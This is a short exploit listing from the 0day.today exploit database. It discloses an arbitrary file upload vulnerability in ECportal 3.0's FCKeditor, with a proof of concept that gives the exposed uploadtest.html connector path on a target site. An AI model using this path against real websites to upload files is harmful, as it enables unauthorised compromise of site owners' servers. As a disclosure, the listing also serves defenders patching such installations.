0day Today Exploits Market and 0day Exploits Database

ECportal FCKeditor Arbitrary File Upload Vulnerability

Author: Hesam Bazvand
Risk: Security Risk High
0day-ID: 0day-ID-24017
Category: web applications
Date added: 10-08-2015
Platform: php

# Exploit Title: ECportal FCKeditor Vulnerability
# Exploit Author: Hesam Bazvand
# Contact: https://www.facebook.com/hesam.king73
# Homepage: http://turk-bh.ir
# Software Link: http://nomra.ir/
# Version: 3.0
# Tested on: Windows 7 / Kali Linux
# Category: WebApps
# Dork : Use Your Mind :D

*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#
POC :
	http://target.com/html/js/editor/fckeditor/editor/filemanager/connectors/uploadtest.html


#  0day.today [2024-12-24]  #